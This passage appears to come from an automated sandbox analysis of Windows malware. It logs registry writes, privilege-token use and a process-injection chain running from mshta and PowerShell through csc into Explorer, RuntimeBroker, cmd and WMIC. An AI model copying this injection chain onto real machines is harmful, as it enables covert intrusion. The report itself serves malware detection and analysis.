00000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643633633635313661653161376534306565613635646130326465313638363932656235633366316266343466393730363338353863333139386530313731000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645e77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645e77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = 8c676aa652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = 3eaaa8a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = 0f69c8a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = e5157fa852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 4f3b44a852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\89e438a32df92b68baa99a7b1f853e9c5016ac2f42d270dcdb0f22cca0d53f2e" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000024ed60a752a7d801af8c9ca752a7d801af8c9ca752a7d8017aa10b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000386231656133646166646331313338306235306237636237313934303836386439663063613365313537383235336564333634373230343837383830366438660000b20009000400efbe03558280035582802e0000000000000000000000000000000000000000000000000002598e00380062003100650061003300640061006600640063003100310033003800300062003500300062003700630062003700310039003400300038003600380064003900660030006300610033006500310035003700380032003500330065006400330036003400370032003000340038003700380038003000360064003800660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38623165613364616664633131333830623530623763623731393430383638643966306361336531353738323533656433363437323034383738383036643866000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8646077a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8646077a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 127f80a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d82b1ea752a7d80159d8aaa752a7d80159d8aaa752a7d8014aae0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000393332313463656439373862316633666135633337626465356161373133303261303763613265393436396233373063633131626336313933303830336266330000b20009000400efbe03558280035582802e0000000000000000000000000000000000000000000000000076688200390033003200310034006300650064003900370038006200310066003300660061003500630033003700620064006500350061006100370031003300300032006100300037006300610032006500390034003600390062003300370030006300630031003100620063003600310039003300300038003000330062006600330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39333231346365643937386231663366613563333762646535616137313330326130376361326539343639623337306363313162633631393330383033626633000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645a77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645a77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 844 wrote to memory of 1816 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 844 wrote to memory of 1816 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 844 wrote to memory of 1816 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4424 wrote to memory of 3932 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 3932 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3932 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 516 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 516 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3932 wrote to memory of 696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3932 wrote to memory of 696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 696 wrote to memory of 1932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 696 wrote to memory of 1932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3932 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 1860 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1860 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1860 wrote to memory of 3656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1860 wrote to memory of 3656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1860 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1860 wrote to memory of 1344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
